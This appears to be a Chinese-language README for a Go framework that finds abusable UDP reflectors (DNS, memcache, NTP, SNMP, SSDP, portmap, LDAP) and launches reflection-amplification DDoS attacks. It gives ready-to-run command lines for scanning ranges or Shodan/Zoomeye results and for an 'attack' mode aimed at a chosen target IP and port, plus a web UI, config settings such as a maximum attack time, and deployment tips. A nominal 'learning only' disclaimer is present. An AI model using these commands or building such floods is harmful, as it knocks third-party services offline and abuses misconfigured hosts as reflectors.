Drdos Framework是我学习反射型ddos的产出,我尝试将它设计为一个真正意义上的框架。这是它运行的图片。现已支持WEB模式(匆忙撰写,多多包含)
该框架仅用于学习,禁止用于其他任何非法用途
Drdos框架是一个既可以用来校验IP是否存在drdos漏洞,又可以用来进行一些攻击测试的框架
- 一台在公网的Linux服务器
- Golang环境
-
命令模式
check模式 [稳定性较好,check百万级IP不会出错]
go run main.go -m c -s xx.xx.xx.xx -type dns -api -o test.txt # 使用api查询,需要在config.go中进行修改 go run main.go -m c -s xx.xx.xx.xx -type dns -range xx.xx.xx.xx/24 -o test.txt # 扫描指定网段 go run main.go -m c -s xx.xx.xx.xx -type dns -f input.txt -o test.txt # 从文件中获取IP地址
attack模式
go run main.go -m a -f xxx -type dns -t xx.xx.xx.xx -p xx # 要注意如果攻击没有效果,可能是前面有NAT[ * ] 注意 : 运行
go run main.go --help来查看帮助 -
WEB模式
go run main.go -m h运行带webUI的程序,登录的账号为admin,密码在控制台中出现,注意保存
--type应该为dns,mem,ntp,snmp,ssdp,portmap,ldap中的一种- 如果在阿里云上使用,记得在安全组上允许UDP,并把IP(即
-s选项)设为eth0的网卡IP(而不是公网IP)
默认的配置文件在 config/config.go ,下面是默认的配置
package config
const (
ListenPort = 50000 // Check ip列表的时候的监听端口
Threshold = 100 // 当包的大小大于阈值的时候,计数接受
WaitTime = 10 // 全部发包完毕后,等待其余数据包的时间
Blacklists = "/data/blacklists/blacklists"
MaxAtktime = 300 // 最大攻击时间
AttackInterval = 0
ShodanApi = ""
ShodanPage = 10 // 默认搜索页数,10页=1000个
ZoomeyeApi = ""
ZoomeyePage = 20 // 默认搜索页数,20页=400个
HttpPort = 65000 // Http默认监听端口
)| Port | Protocol |
|---|---|
| 53 | dns |
| 111 | portmap |
| 123 | ntp |
| 161 | snmp |
| 389 | ldap |
| 1900 | ssdp |
| 11211 | memcache |
- HTTP API
- 文件上传以及展示接口
- 搜索引擎API接口
- Zoomeye
- Shodan
- Fofa
- 攻击黑名单
- 使用Context包而不是sleep
- 优化返回值check
- 更多的协议支持
- OpenVPN
- 使用sqlite来进行文件存储(这个我认为是功能点的问题,需要再思考一下)

